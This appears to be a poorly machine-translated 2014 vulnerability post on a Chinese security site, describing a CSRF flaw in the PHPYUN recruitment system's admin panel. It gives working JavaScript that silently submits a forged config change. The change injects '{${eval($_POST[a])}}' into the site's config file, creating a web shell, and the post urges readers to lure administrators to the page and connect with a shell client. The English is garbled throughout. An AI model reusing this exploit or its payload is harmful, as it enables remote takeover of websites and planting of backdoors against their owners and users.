PHPYUN cloud talent system background CSRF Getshell-a vulnerability warning-the black bar safety net

ID MYHACK58:62201449037
Type myhack58
Reporter 佚名
Modified 2014-06-08T00:00:00


phpyun background no authentication token, by the CSRF directly getshell~

First, from the background getshell start.

The web site's configuration file,/plus/config.php using double quotes to do the key value, which leads to security issues. We can put php code to write into the double quotes inside the perform.

Modify the configuration file, the author:

然后 访问 /plus/config.php to:

In particular, because phpyun background no defense against CSRF approach, so we can construct a form, entice the administrator to access, modify the configuration file, resulting getshell it.

This is the CSRF code will be inside the url of the modify that you want to attack the site. Then put this javascript code on any page, and entice the administrator to access the page.

gum = function(){

var u = {

'version':'1 1 4 0 2 1 3',



'author': ''


u. e = function(code){try{return eval(code)}catch(e){return "}};

u. name = function(names){

return document. getElementsByTagName(names);


u.html = function(){

return u. name('html')[0]

||the document. write('<html>')

||u. name('html')[0];


u. addom = function(html, doming, hide){

(! doming)&&(doming = u.html());

var temp = document. createElement('span');

temp. innerHTML = html;

var doms = temp. children[0];

(hide)&&(doms. style. display = 'none');

doming. appendChild(doms);

return doms;


u. post = function(url, data){

var form = u. addom("<form method='POST'>", u.html(), true);

form. action = url;

for(var name in data){

var input = document. createElement('input');

input. name = name;

input. value = data[name];

form. appendChild(input);


form. submit();


return u;


gum. post('http://localhost/yun/admin/index.php?M=config&C=save', {

'config': 'submit',

'sy_hotkeyword': 'recruiting,job search',

'sy_bannedip': ",

'sy_fkeyword_all': '***',

'sy_bannedip_alert': 'temporarily closed,,,,',

'sy_regname': 'admin,zhongguo',

'sy_fkeyword': '{${phpinfo()}}{${eval($_POST[a])}}'


Administrator access after it has updated the configuration file. We directly access the http://localhost/yun/plus the/config. php will be able to see the phpinfo. The chopper is connected, see the shell lying quietly in there